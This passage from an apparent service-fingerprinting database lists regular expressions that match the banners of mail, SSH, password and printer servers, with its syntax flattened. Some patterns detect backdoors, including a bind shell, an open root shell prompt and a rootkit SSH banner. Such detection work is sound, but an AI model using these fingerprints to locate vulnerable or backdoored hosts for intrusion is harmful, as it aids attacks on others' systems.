[^)]*\) ready ([-\w_.]+)\. < +\+OK Welcome to the Atmail POP3 server - Login with user@domain\.\r\n +\+OK Dovecot DA ready\.\r\n +Unable to open trace file \"/var/spool/popper/ +\+OK POP3D\(\*\) Server PMDFV([\w._-]+) at .* <\w+@([\w._-]+)>\r\n +\+OK Pop3 ready\.\r\n +\+OK ([\w._-]+) Cyrus POP3 v([\w._-]+)-OS X Server ([\w._-]+):\t9L1 server ready <[\d.]+@[\w._-]+>\r\n +\+OK Kerio Connect ([\w._ -]+) POP3 server ready <[\d.]+@([\w._-]+)>\r\n +\+OK Welcome NewsGator Online Services POP3 Server version ([\w._-]+)\r\n +\+OK POP3 AnalogX Proxy (\d[-.\w]+) \(Release\) ready\.\n +Proxy\+ POP3 server\. Insecure access - terminating\.\r\n +\+OK Proxy-POP server \(DeleGate/([\d.]+) by ysato AT delegate DOT org\) at ([-\w_.]+) starting\.\r\n +\+OK POP3 Y(?:ahoo)?POPs! proxy ready\r\n +\+OK POP3 \(Spampal\) server ready \(USER command must include mailserver name\)\r\n +\+OK Mirapoint POP3PROXY ([-\w.]+) server ready\r\n +\+OK AVG POP3 Proxy Server Beta - ([\d/.]+) \[[\d.]+\]\r\n +\+OK AVG POP3 Proxy Server ([\d/.]+) \[[\w/.]+\]\r\n +\+OK AVG POP3 Proxy Server <[\w.]+@[-\w_.]+> ([\d/.]+) \[[\d/.]+\]\r\n +-ERR AVG POP3 Proxy Server: Cannot connect to the mail server!\r\n +\+OK POP3 Spam Inspector Spam Filter Gateway Version ([\d.]+) Ready\.\r\n +\+OK MailMarshal\(([\d.]+)\) POP3 server ready <[\d.]+@([-\w_.]+)>\r\n +\+OK HTML2POP3 server ready \(([\d.]+)\)\r\n +\+OK ([-\w_.]+) POP3 proxy ready\r\n +\+OK AVG POP3 Proxy Server <[\d.]+@([-\w_.]+)> ([\d.]+)/[\d.]+ \[[\d/.]+\]\r\n +\+OK InterScan VirusWall POP3 Proxy\r\n +-ERR 403 The requested host is forbidden by WinProxy\. See your network administrator\.\n +\+OK MrPostman webmail proxy ready\r\n +\+OK F-Secure/fsigk_pop/\d+/[-\w_.]+ starting\.\r\n +\+OK hello from popgate\(([\d.]+)\)\r\n +\+OK \[ISafe POP3 Proxy\] \r\n +\+OK <[\d.]+@([-\w_.]+)> \[ISafe POP3 Proxy\] \r\n +\+OK UserGate: forward ready\r\n-ERR UserGate: Mistake of the protocol\r\n +\+OK kingate pop3 proxy\r\n +\+OK avast! POP3 proxy ready\.\r\n +\+OK O3SIS UMA Proxy POP3 Server ([\w._-]+)\r\n +200 ([-._\w]+) poppassd v?([-._\w]+) +200 poppassd hello, who are you\?\r\n +200 hello there, who are you\?\r\n +200 hello there, please tell me who you are\r\n +200 poppassd v([\w.]+) for Digital Unix with C2 security Hello, who are you\?\r\n +200 ([-.+\w]+) MercuryW PopPass server ready\.\r\n| p|Mercury/32 poppass service +200 X1 NT-PWD Server ([-.+\w]+) \(IMail (\d[-.\w]+)\)\r\n +200 CommuniGate Pro PWD Server (\d[-.\w]+) ready < +550 Login failed - already \d+/\d+ users connected sorry \(use G_CON_PERIP_EXCEPT to bypass\) \(IP=[\d.]+\)\r\n +200 Post\.Office v([\d.]+) password server ready\r\n +\+OK [-\[\]\(\)!,/+:<>@.\w ]+\r\n +lpd \[@([-\w_.]+)\]: connected from invalid port \(\d+\)\n| p|BSD/Linux lpd +lpd: Host name for your address \(\d+\.\d+\.\d+\.\d+\) unknown\n +([-\w_.]+): /usr/lib/lpd: Malformed from address\n +\d+-201 ill-formed FROM address\. +\0\.[\w._/-]+/Library/Preferences/PyCharm([\w._-]+)\0\)[\w._/-]+/Library/Caches/PyCharm[\w._-]+ +QAS2 +\0\0\x01V\xff\xff\xff\xff\xff\xffRT\0\x124V\x08\0E.\x01H...\0.\x11..\0\0\0\0\xff\xff\xff\xff\0D\0C\x014.{1,2}\x01\x01\x06\0......\0{18}RT\0\x124V\0{202}c\x82Sc5\x01 +\r\nHello, this is [Qq]uagga \(version (\d[-.\w]+)\)\.\r\nCopyright 1996-200 +200-?RAP 1 ([-\w_.]+) ([-\w_.]+) radmind access protocol\r\n +\0.\0\x01\0\0\0\0.*\x0b\0\0\0\0([-\w_]+)\x00437 +_realplayfavs_::([\w\s]+)::connected\0 +(\d+\.\d+\.\d+) G\0\0\0\xb6\0.\t +\xe1\xe7\xef\xf0\0\0\x00.\(Righteous Backup Linux Agent\) ([^\xe1]+)\xe1\xe7\xe6\x07\0\x01\0 +\xe1\xe7\xe6\x07\0\x01\0 +roku: ready\r\n +\+host=cashew version=([\d.]+) uptime=[\d+:]+ audio-bits=\d+ audio-byte-order=\w+-endian +\0\0\0.NI_RTERR\0.\0\0\xff\xff\xff\xfb\0\0\0.\*ERR\*\x001\0connection timed out\0-5\0NI \(network interface\)\x007\d0\x003\d\0nirout\.cpp\x00\d\d\d\d\0RTPENDLIST::timeoutPend: CONNECTED timeout\0\w+ +\w+ +\d+ +\d+:\d+:\d+ +\d+\0\0\0\x0046\0SAProuter ([\w._ ()-]+) on '([\w._-]+)'\0\0\0\0\0\*ERR\*\0\0\0\0\0 +\x02\x1c50\x1c\x03\0\0\0\0 +\"IMPLEMENTATION\" \"Cyrus timsieved v([\w._-]+-Debian[- ][\w._+-]+)\"\r\n +\"IMPLEMENTATION\" \"Cyrus timsieved \(Murder\) v([-.\w]+)\"\r\n +\"IMPLEMENTATION\" \"Cyrus timsieved v([\w_.]+)-OS X ([^"]+)\"\r\n +\"IMPLEMENTATION\" \"Cyrus timsieved v(\d[-.\w]+)\"\r\n| p/Cyrus timsieved/ v/1/ i|included w/cyrus imap +\"IMPLEMENTATION\" \"dovecot\"\r\n +\"IMPLEMENTATION\" \"DBMail timsieved ([\w._-]+)\"\r\n +/usr/share/pysieved/plugins/dovecot\.py:27: DeprecationWarning: The popen2 module is deprecated\. Use the subprocess module\.\n import popen2\n\"IMPLEMENTATION\" \"pysieved ([\w._+-]+)\"\r\n +\"IMPLEMENTATION\" \"Dovecot Pigeonhole\"\r\n\"SIEVE\" \"[\w._;-]+(?:\s+[\w._;-]+)*\"\r\n\"NOTIFY\" \"mailto\"\r\n\"SASL\" \"[\w._;-]*(?:\s+[\w._;-]+)*\"\r\n\"STARTTLS\"\r\n\"VERSION\" \"([\w._-]+)\"\r\nOK \"Dovecot ready\.?\"\r\n +SGMS Scheduler SGMS (\d+) ([\d.]+) .*\n> +t\x03\0\0 +\x01remshd: Kerberos Authentication not enabled\.\n +\x01remshd: Error! Kerberos authentication failed +(?:ba)?sh-\d\.\d\d\w?# +:: w4ck1ng-shell \(Private Build v([\w._-]+)\) bind shell backdoor :: \n\n +GENERAL: \d+ \d+\n +220 SLNP (\w+)@[vV]ersion:\s?V?([^@]+)@user:([^@]+)@pid:\d+\n +220 ([-\w_.]+) PGP Universal service ready \(proxied server greeted us with: (.*)\)\r\n +220 ([-/.+\w]+) MailGate ready for ESMTP on +220 ([-/.+\w]+) SMTP ready to roll\r\n +220 ([-/.+\w]+) Internet Rex ESMTP daemon at your service\.\r\n +220 ([-.+\w]+) ESMTP NetIQ MailMarshal \d[-.\w]+ Service Pack (\w+) \(v(\d[-.\w]+)\) Ready\r\n +554-([-.+\w]+)\.us\r\n554 Access denied\r\n +220.*?MERCUR SMTP[\s-]Server \(v([^)]+)\) for ([-.\w ]+) ready at +220 ([-.\w\d]+) ESMTP \([a-fA-F0-9]{32}\)\r\n +554 Service unavailable; Client host \[[\w._-]+\] blocked using Barracuda Reputation; +220 ([-.+\w]+) Mercury/32 v(\d[-.\w]+) ESMTP server ready\.\r\n| p|Mercury/32 smtpd +520 Connection not authorised from this address\.\r\n +554 SMTP service not available\r\n +220 ([-\w_.]+) <1\d+\.\d+@[-\w_.]+> \[XMail (\d[-.\w]+) ESMTP Server\] service ready +421 \[XMail ([\d.]+) \(Linux/Ix86\) ESMTP Server\] - Server does not like Your IP\r\n| p/XMail SMTP server/ v/1/ i|Linux/x86 +220 ([-.\w]+) FirstClass ESMTP Mail Server v(\d[-.\w]+) ready\r\n +220 ([-.\w]+) AppleMailServer (\d[-.\w]+) SMTP Server Ready\r\n +220 ([-.\w]+) eXtremail V(\d[-.\w]+) release (\d+) rev(\d+) ESMTP server ready \.\.\.\r\n +220 ([-.\w]+) service desk (\d[-.\w]+) SMTP Service Ready for input\.\r\n +220 ([-.\w]+) VPOP3 SMTP Server Ready\r\n +421 Insufficient System Storage\.\(IMail ([\d.]+)\)\r\n +220 \[?([-.+\w]+)\]? Microsoft ESMTP MAIL Service, Version: ([-\w.]+) ready +220 ([-\w_.]+) Microsoft ESMTP MAIL Service ready at +220 ([\w._-]+) Microsoft ESMTP MAIL Service Version: ([\w._-]+)\r\n +220 ([-.+\w]+) ESMTP Server \(Microsoft Exchange Internet Mail Service ([-\w.]+)\) ready +220 \+OK Microsoft Exchange SMTP server version ([\d.]+) +220[- ].*\r\n220[- ]([^\r\n]+) ESMTP Exim +220 CheckPoint FireWall-1 secure ESMTP server\r\n +220 CheckPoint FireWall-1 secure SMTP server\r\n +220 ([-.+\w]+) running IBM AS/400 SMTP V([\w]+)| p|IBM AS/400 smtpd +220 ([-.+\w]+) ESMTP MailEnable Service, Version: (\d[\w.]+)- ready at +220 ([-.+\w]+) ESMTP MailEnable Service, Version: \d+--([\d.]+) ready at +220 ([-.+\w]+) ESMTP MailEnable Service, Version: ([\w._-]+) ready at +530 ([-.+\w]+) ESMTP MailEnable Service, Version: ([\w._-]+) denied access at +220 ([-.+\w]+) SMTP/smap Ready\.\r\n +220 ([-.+\w]+) ESMTP service \(Netscape Messaging Server ([-.+ \w]+) \(built +220-InterScan Version (\S+) .*Ready\r\n220 ([-.+\w]+) NTMail \(v([-.+\w]+)/.* ready +220-InterScan Version (\S+) .*Ready\r\n220 ([-.+\w]+) ESMTP Postfix\r\n +220-InterScan Version (\S+) .*Ready\r\n220 ([-.+\w]+) Microsoft ESMTP MAIL Service, Version: ([\d.]+) ready at +220 Trend Micro ESMTP ([-.+\w]+) ready\.\r\n +220(\S+) WebShielde(\w+)/SMTP Ready. +220 ([-.+\w]+) ESMTP MailMasher ready to boogie\r\n +220 ([-.\w]+) ESMTP Postfix \(([-.\w]+)\) \(([-.\w ]+)\) +220 [\*\d\ ]{2,300}\r\n +220 ArGoSoft Mail Server Pro for WinNT/2000/XP, Version ([-.\w]+) \(([-.\w]+)\)\r\n +220 ([-\w.]+) ArGoSoft Mail Server Pro for WinNT/2000/XP, Version [\d.]+ \(([\d.]+)\)\r\n +220 ([-\w.]+) ArGoSoft Mail Server, Version [\d.]+ \(([\d.]+)\)\r\n +220 ([-\w_.]+) ArGoSoft Mail Server Freeware, Version [\d.]+ \(([\d.]+)\)\r\n +220 ([-.\w]+) ESMTP Service. Welcome.\r\n +220 ([-.\w]+) Mercury (\d[-.\w]+) ESMTP server ready\.\r\n +220 ESMTP Service \(Lotus Domino Release ([\w._-]+)\) ready at +220 ([-.\w]+) ESMTP Service \(Lotus Domino Release (\d[-.\w ]+)\) ready +220 ([-.\w]+) ESMTP Service \(Lotus Domino (\d[-.\w ]+)\) ready at +220 ESMTP Service \(Lotus Domino Build V([\w_]+) Beta (\w+)\) ready at +220 ([-.\w]+) ESMTP Service \(Lotus Domino Versione ([\w._ -]+)\) ready +220 ([-.\w]+) Lotus SMTP MTA Service Ready\r\n +220 ([-.\w]+) WebSTAR Mail Simple Mail Transfer Service Ready\r\n +220 ([-.\w]+) SMTP NAVGW (\d[-.\w]+); +220 ([-.\w]+) Kerio MailServer (\d[-.\w]+ patch \d+) ESMTP ready\r\n +220 YSmtp(\S+) ESMTP service ready +220 (\S+) ESMTP WEB.DE V([^\s\;]+) +220 Compuserve Office Mail Service \(lnxc-(\d+)\) ESMTP +220 Welcome to Nemesis ESMTP server on \S+ +220 (\S+).*?SMTP \(Sun Internet Mail Server sims.(\d[^\)]+)\) +220 (\S+) ESMTP XWall v(\d\S+) +220 (\S+) eMail Sentinel (\d+) ESMTP Service ready +220 ([-\w_.]+) Service ready by DvISE PostMan \((\d+)\) ESMTP Server \(Tobit Software, Germany\)\r\n +220 ([-\w_.]+) -- Server ESMTP \(Sun Java\(tm\) System Messaging Server ([\w._-]+) (\d+)bit \(built .*\)\)\r\n +220 (\S+) -- Server ESMTP \(Sun Java System Messaging Server (\d[^\(\)]+) +220[- ][^ ]+ Smail-([^ ]+) +220-([-\w_.]+) Stalker Internet Mail Server V\.([\w.]+) is ready\.\r\n +220 ([-\w_.]+) ESMTP MailMax ([\d.]+) [A-Z][a-z][a-z].*\r\n +220 ([-\w_.]+) Mailmax version ([\d. ]+) ESMTP Mail Server Ready \r\n +220 ([-\w_.]+) running IBM MVS SMTP CS V2R10 on .*\r\n +220 [-\w_]+ ESMTP ([-\w_.]+) \(Debian/GNU\)\r\n +220 ESMTP \(Debian/GNU Mewwwwwww\)\r\n +220 ([\w._-]+) [\w._-]+ ESMTP Postfix \(Debian/GNU\) +220 ([-\w_.]+) ESMTP postfix NO UCE\r\n +220 ([-\w_.]+) SMTPD Server - Postfix\r\n +220 ([-\w_.]+) ESMTP Oracle Email Server SMTP Inbound Server\t([\d.]+) \t Ready\r\n +220 ([-\w_.]+) Mail essentials server \(([\d.]+)\) ready for ESMTP transfer\r\n +220 ([-\w_.]+) ESMTP - WinRoute Pro ([\d.]+)\r\n +220 ([-\w_.]+) ESMTP Lyris ListManager service ready\r\n +220 ESMTP Lyris service ready\r\n +220 ESMTP Lyris ListManager service ready\r\n +220 ([-\w_.]+) SMTP Ready 12\.\r\n +220 ([-\w_.]+) ESMTP server \(Netscape Messaging Server - Version ([\d.]+)\) ready .*\r\n +220 ([-\w_.]+) ZMailer Server ([\w.]+) #\d+ ESMTP ready at .*\r\n +220 Coremail SMTP\(Anti Spam\) System \(\w+\[(\d+)\]\)\r\n +220 ([-\w_.]+) \(PowerMTA(?:\(TM\)) v([\w.]+)\) ESMTP service ready\r\n +220 ([-\w_.]+) ESMTP BorderWare MXtreme Mail Firewall\r\n +220 ([-\w_.]+) SMTP Server \(JAMES SMTP Server\) ready +220 ([-\w_.]+)\s+ESMTP MDaemon ([\d.]+); .*\r\n +220[ -]([-\w_.]+) ESMTP MSA MDaemon ([\d.]+); +421 Sorry, SMTP server too busy right now \(193\); try again later\r\n +220 ([-\w_.]+) ESMTP HT Mail Server v([\d.]+); .*\r\n +220 ([-\w_.]+) ESMTP IceWarp ([\d.]+)[; ] +220 ([-\w_.]+) ESMTP Gruponet IE2020 ([\d./]+);\r\n +220 ([-\w_.]+) mailfront ESMTP\r\n +220 ([-\w_.]+) SMTP Server SLmail ([\d.]+) Ready ESMTP spoken here\r\n +220 ([-\w_.]+) VaMailArmor-([\d.]+)\r\n +220 ([-\w_.]+) ESMTP MailFrontier \(([\d.]+)\)\r\n +220 ([-\w_.]+) WindowsNT SMTP Server v([\w/.]+) ESMTP ready at .*\r\n +220 ([-\w_.]+) \(LSMTP for Windows NT v([\w.]+)\) ESMTP server ready\r\n +220 ([-\w_.]+) SMTP Mandamail ([\d.]+)/[\d.]+\r\n +500 Permission denied - closing connection\.\r\n +220 \(SMTP\) hMailServer ([\d.]+) - Up since .*\r\n +220 ([-\w_.]+) Ready for action \(Mailtraq ([\d.]+)/E?SMTP\)\r\n +220 ([-\w_.]+) SMTP Service Ready \(QuickMail Pro Server for MacOS ([\d.]+)\)\r\n +220 LiteMail SMTP Server Ready\.\r\n +220 ([-\w_.]+) SMTP Server \(DeskNow SMTP Server ([\d.]+)\) ready .*\r\n +220 ([-\w_.]+) SMTP Server \(DeskNow\) ready +220 network-box ESMTP\r\n +220 ESMTP on WebEasyMail \[([\d.]+)\] ready\. http://www\.51webmail\.com\r\n +220 ([-\w_.]+) AntiVir MailGate\r\n +220 server ESMTP KEN! v([\d.]+); .*\r\n +220 ([-\w_.]+) NTMail \(v([\d.]+)/[\w.]+\) ready for ESMTP transfer \r\n +220-([-\w_.]+) Sendmail IBM OS/2 SENDMAIL VERSION ([\w./]+) ready at .*\r\n220 ESMTP spoken here\r\n| p/Sendmail smtpd/ v/2/ o|OS/2 +220 shttp\.srv Simple Mail Transfer Service Ready\r\n +501 Domain must resolve\r\n +220 ([-\w_.]+) ModusMail ESMTP Receiver Version ([\d.]+) Ready\r\n +220 mailmatrix SMTP Server \(Mail Matrix Server\) ready +220-([-\w_.]+) ESMTP .* GoMail V([\d.]+); +220 [-\w_.]+ Winmail Mail Server ESMTP ready\r\n +220 ([-\w_.]+); .* \+\d+\r\n +421 unable to read controls \(#4\.3\.0\)\r\n +554 Please check that your outgoing mail server settings are correct\. Contact your service provider's technical support for assistance\.\n +rblsmtpd: [\d.]+ pid \d+:.*220 rblsmtpd\.local\r\n +220 SurgeSMTP \(Version ([-\w_.]+)\) http://surgemail\.com\r\n +220 ([-\w_.]+) Welcome to RaidenMAILD E?SMTP service v([\d.]+), +220 ESMTP on WinWebMail \[([\d.]+)\] ready\. http://www\.winwebmail +220-W E L C O M E T O Q U A R K M A I L S M T P S E R V I C E !\r\n220 ([-\w_.]+) ESMTP server \(quarkmail server - version ([\d.]+)\) ready +220 .*\r\n221 2\.7\.0 Error: I can break rules, too\. Goodbye\.\r\n +220 ([-\w_.]+) running EIMS X ([\w.]+)\r\n +220 DP-3510\r\n +220 ([-\w_.]+) Axigen ESMTP ready\r\n +421 Unexpected log failure, please try later\r\n +220 ([-\w_.]+) DynFX ESMTP Server ([-\w_.]+) \( +220 ;; ESMTP connection timed out; no servers could be reached Sendmail ([-\w_.]+)/ +554 ([-\w_.]+) ESMTP not accepting messages\r\n +220 ([-\w_.]+) L-Soft HDMail SMTP Service Version: ([-\w_.()]+) ready +220 ([-\w_.]+) Synchronet SMTP Server ([\d.]+)-Win32 Ready\r\n +220 ShareMailPro SMTP Server Ready \r\n +220 ([-\w_.]+) ESMTP Service\(Mail2000 ESMTP Server V([-\w_.]+)\) ready +220 ([-\w_.]+) 4D WebSTAR V Mail \(([-\w_.]+)\) Ready for action\r\n +220 Service ready KM([\w._-]+) smtpd\r\n +220 ([\w_.-]+) cqgreylist - minimal smptd\r\n +220 ([\w_.-]+) ESMTP AnNyungSMTP ([\w._-]+); +220 DP-1820E\r\n +220 ([\w_.-]+) VHCS2 [\w._-]+ (\w+) Managed ESMTP ([\w._-]+)\r\n +220.*SMTP Welcome to the IA eMailServer Standard Edition Version: ([\d.]+ Build: [\d]+) +220 ([\w_.-]+) bizsmtp ESMTP server ready\r\n +220 ([\w_.-]+) ESMTP NetBox\(tm\)\r\n +220 ([\w_.-]+) StrongMail SMTP Service Version: (\S+) ready +421 Service not available, closing transmission channel\r\n +421 Service not available, closing transmission channel \r\n +220 ([\w_.-]+) ESMTP OpenSMTPD\r\n +220 ([\w_.-]+) ESMTP Citadel server ready\.\r\n +220 BEJY V([\w._-]+) SMTP ([\w._-]+) \(c\) \d+-\d+ by BebboSoft, Stefan \"Bebbo\" Franke, all rights reserved ready\r\n +220 Welcome NGOS SMTP Server version ([\w._-]+)\r\n +220 ([\w._-]+) Kerio Connect ([\w._ -]+) ESMTP ready\r\n +220 ([\w._-]+) running IBM VM SMTP Level (\d+) on +421 4\.3\.2 Service not available\r\n +220 ([\w._-]+) Service ready by David\.fx \(([\w._-]+)\) ESMTP Server \(Tobit\.Software, Germany\)\r\n +220 HOST: ([\w._-]+) Supportworks ESMTP Server ([\w._-]+) ready\r\n +220 ([-\w_.]+) SMTP/DeleGate/([\d.]+) ready at .*\r\n +220 ([-/.+\w]+) SMTP AnalogX Proxy (\d[-.\w]+) \(Release\) ready\r\n +220 ([-\w_.]+) ESMTP spamd IP-based SPAM blocker; .*\r\n +220 ESMTP smtprelay service ready\.\r\n +220 ([-\w_.]+) SMTP hotsmtpd v([\d.]+)\. ESMTP-HTTPMail Gateway based on hotwayd\.\r\n +220 ([-\w_.]+) Welcome SpamFilter for ISP SMTP Server v([\d.]+) - Unlicensed Evaluation Copy\r\n +421 proxyplus\.universe SMTP server\. Insecure access - terminating\.\r\n +220 AVG ESMTP Proxy Server Beta - ([\d./]+) \[[\d.]+\]\r\n +220 AVG ESMTP Proxy Server ([\d./]+) \[[\d./]+\]\r\n +554 ([\d.]+) ([-\w_.]+) No mail service\r\n +220 Traffic Inspector SMTP Gate \(SPAM protected\), ver\. ([\w._-]+), ready at.*\r\n +220 mailwall SMTP Server \(Ikarus MailWall by David Grabenweger\) ready\r\n +220 ([-\w_.]+) ESMTP - eXpurgate ([\d.]+) \( +220 CCProxy ([\d.]+) SMTP Service Ready\(Unregistered\)\r\n +NoSpamToday! SMTP Proxy Monitoring Service Ready\.\r\n +220 ([-\w_.]+) ESMTP bitdefender +220 ([-\w_.]+) ESMTP BitDefender Proxy version ([^\r\n]+)\r\n +220 [-\w_.]+ avast! SMTP proxy ready\.\r\n +220 ([-\w_.]+) (SCM\d+)/SMTP Ready\.\r\n +554 You are not allowed to connect\.\r\n +220 ([\w._-]+) ESMTP Symantec Brightmail Gateway\r\n +220 ([\w._-]+) ESMTP server ready \(Alligate v([\w._-]+)\)(?: AUTH ONLY)?\r\n +220 ([\w._-]+)\.ARK Sendmail ready\. \r\n +421 too many connections\r\n +220 ([-\w_.]+) ESMTP Service ready\r\n +220 ([\w._-]+) AVKSMTP Server\r\n +220 (\S+) Welcome to SpamFilter for ISP SMTP Server v(\d\S+) +220[\s-].*?E?SMTP[^\r]*\r\n +550 (\d.\d.\d) ([^\r\n]+) +Statistics from .*\n M msgsfr bytes_from msgsto bytes_to msgsrej msgsdis Mailer\n +220 ([-.\w]+) SNPP server \(HylaFAX \(tm\) Version ([-.\w]+)\) ready.\r\n +220 QuickPage v(\d[-.\w]+) SNPP server ready at +250\r\nProtocol-Version:(\d[\d.]+)\r\nMessage-ID:\d+\r\nDatabase .*\r\nContent-Length:\d+\r\nKey Length:(\d+)\r\n\r\n.*(\w:\\.*ini)\r\n\r\n +SPMD_ACK\0\0\x01\0\x01 +SSH-([\d.]+)-([\d.]+) F-Secure SSH Windows NT Server\r?\n +SSH-([\d.]+)-([\d.]+) dss F-SECURE SSH\r?\n +SSH-([\d.]+)-([\d.]+) F-SECURE SSH.*\r?\n +SSH-([\d.]+)-ReflectionForSecureIT_([-\w_.]+) - Process Software MultiNet\r\n +SSH-([\d.]+)-ReflectionForSecureIT_([-\w_.]+)\r?\n +SSH-(\d[\d.]+)-SSH Protocol Compatible Server SCS (\d[-.\w]+)\r?\n +SSH-([\d.]+)-SSH Compatible Server\r?\n +SSH-([\d.]+)-([\d.]+) SSH Secure Shell Tru64 UNIX\r?\n +SSH-([\d.]+)-(\d+\.\d+\.\d+) SSH Secure Shell +sshd: SSH Secure Shell (\d[-.\w]+) on ([-.\w]+)\nSSH-(\d[\d.]+)- +sshd2\[\d+\]: .*\r\nSSH-([\d.]+)-(\d[-.\w]+) SSH Secure Shell \(([^\r\n\)]+)\)\r?\n +SSH-([\d.]+)-(\d+\.\d+\.[-.\w]+) +SSH-([\d.]+)-OpenSSH_([\w._-]+) Debian-(\S*maemo\S*)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+)[ -]{1,2}Debian[ -_]([^\r\n]+)\r?\n +SSH-([\d.]+)-OpenSSH_[\w.]+-FC-([\w.-]+)\.fc(\d+)\r\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD-([\d]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD localisations (\d+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD-openssh-portable-(?:[\w.,]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD-openssh-portable-overwrite-base +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD-openssh-gssapi- +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) miniBSD-([\d]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) NetBSD_Secure_Shell-([\w._-]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+)_Mikrotik_v([\d.]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) in RemotelyAnywhere ([\d.]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+)\+CAN-2004-0175\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) NCSA_GSSAPI_20040818 KRB5\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+-hpn\w+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+\+sftpfilecontrol-v[\d.]+-hpn\w+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+-hpn) NCSA_GSSAPI_\d+ KRB5\r?\n +SSH-([\d.]+)-OpenSSH_3\.4\+p1\+gssapi\+OpenSSH_3\.7\.1buf_fix\+2006100301\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+\.RL)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+-CERN\d+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+\.cern-hpn) +SSH-([\d.]+)-OpenSSH_([\w._-]+-hpn)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+-pwexp\d+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+)-chrootssh\n +SSH-([\d.]+)-Nortel\r?\n +SSH-([\d.]+)-OpenSSH_([\w_.-]+) DragonFly-\d+\r?\n +SSH-([\d.]+)-OpenSSH_([\w_.-]+) FIPS\n +\0\0\0\\0\0\0\0\x01\0\0\0\x1bNo host key is configured!\n\r!\"v +SSH-(\d[\d.]+)-SSF-(\d[-.\w]+)\r?\n +SSH-(\d[\d.]+)-lshd_(\d[-.\w]+) lsh - a free ssh\r\n\0\0 +SSH-(\d[\d.]+)-lshd-(\d[-.\w]+) lsh - a GNU ssh\r\n\0\0 +SSH-([\d.]+)-Sun_SSH_(\S+) +SSH-([\d.]+)-meow roototkt by rebel +SSH-(\d[\d.]*)-(AKAMAI-I*)\r?\n +SSH-(\d[\d.]*)-(Server-V)\r?\n +SSH-(\d[\d.]*)-(Server-VI)\r?\n +SSH-(\d[\d.]*)-(Server-VII)\r?\n +SSH-(\d[\d.]+)-Cisco-(\d[\d.]+)\r?\n +\r\nDestination server does not have Ssh activated\.\r\nContact Cisco Systems, Inc to purchase a\r\nlicense key to activate Ssh\.\r\n +SSH-2\.0-0\.0 \r?\n +SSH-([\d.]+)-([\w.]+) VShell\r?\n +SSH-([\d.]+)-([\w.]+) \(beta\) VShell\r?\n +SSH-([\d.]+)-(\d[-.\w]+) sshlib: WinSSHD (\d[-.\w]+)\r?\n +SSH-([\d.]+)-(\d[-.\w]+) sshlib: WinSSHD\r?\n +SSH-([\d.]+)-([\w._-]+) sshlib: sshlibSrSshServer ([\w._-]+)\r\n +SSH-([\d.]+)-([\w._-]+) sshlib: GlobalScape\r?\n +SSH-([\d.]+)-([\w._-]+) sshlib: EdmzSshDaemon ([\w._-]+)\r\n +SSH-([\d.]+)-([\w._-]+) FlowSsh: WinSSHD ([\w._-]+)\r\n +SSH-([\d.]+)-([\w._-]+) FlowSsh: WinSSHD ([\w._-]+): free only for personal non-commercial use\r\n +SSH-([\d.]+)-([\w._-]+) FlowSsh: WinSSHD: free only for personal non-commercial use\r\n +SSH-1\.5-X\r?\n +Access to service sshd from [-\w_.]+@[-\w_.]+ has been denied\.\r\n +SSH-([\d.]+)-FortiSSH_([\d.]+)\r?\n +SSH-([\d.]+)-cryptlib\r?\n +SSH-2\.0-1\.0 Radware SSH \r?\n +SSH-2\.0-(\d{8,12})\r?\n +SSH-2\.0-Twisted\r?\n +SSH-2\.0-PGP\r?\n +SSH-([\d.]+)-libssh-([-\w.]+)\r?\n +SSH-([\d.]+)-HUAWEI-VRP([\d.]+)\r?\n +SSH-([\d.]+)-VRP-([\d.]+)\r?\n +SSH-([\d.]+)-lancom\r?\n +SSH-([\d.]+)-xxxxxxx\r?\n| p|Fortinet VPN/firewall sshd +SSH-([\d.]+)-AOS_SSH\r?\n +SSH-([\d.]+)-RedlineNetworksSSH_([\d.]+) Derived_From_OpenSSH-([\d.])+\r?\n +SSH-([\d.]+)-DLink Corp\. SSH server ver ([\d.]+)\r?\n +SSH-([\d.]+)-FreSSH\.([\d.]+)\r?\n +SSH-([\d.]+)-Neteyes-C-Series_([\d.]+)\r?\n +SSH-([\d.]+)-IPSSH-([\d.]+)\r?\n| p|Cisco/3com IPSSHd +SSH-([\d.]+)-DigiSSH_([\d.]+)\r?\n +SSH-([\d.]+)-0 Tasman Networks Inc\.\r?\n +SSH-([\d.]+)-([\w.]+)rad\r?\n +SSH-([\d.]+)-OpenSSH_([\d.]+) in DesktopAuthority ([\d.]+)\r?\n +SSH-1\.5-SSH\.0\.1\r?\n +SSH-([\d.]+)-Ingrian_SSH\r?\n +SSH-([\d.]+)-PSFTPd PE\. Secure FTP Server ready\r?\n +SSH-([\d.]+)-BlueArcSSH_([\d.]+)\r?\n +SSH-([\d.]+)-Zyxel SSH server\r?\n +SSH-([\d.]+)-paramiko_([\w._-]+)\r?\n +SSH-2\.0-SSH_0\.2\r?\n +SSH-([\d.]+)-CoreFTP-([\w._-]+)\r?\n +SSH-([\d.]+)-RomSShell_([\w._-]+)\r\n +Could not load host key\. Closing connection\.\.\. +SSH-([\d.]+)-WS_FTP-SSH_([\w._-]+)(?: FIPS)?\r\n +SSH-([\d.]+)-http://www\.sshtools\.com J2SSH \[SERVER\]\r\n +SSH-([\d.]+)-DraySSH_([\w._-]+)\n\n\rNo connection is available now\. Try again later! +SSH-([\d.]+)-Pragma FortressSSH ([\d.]+)\n +SSH-([\d.]+)-SysaxSSH_([\d.]+)\r\n +SSH-([\d.]+)-1\.00\r\n 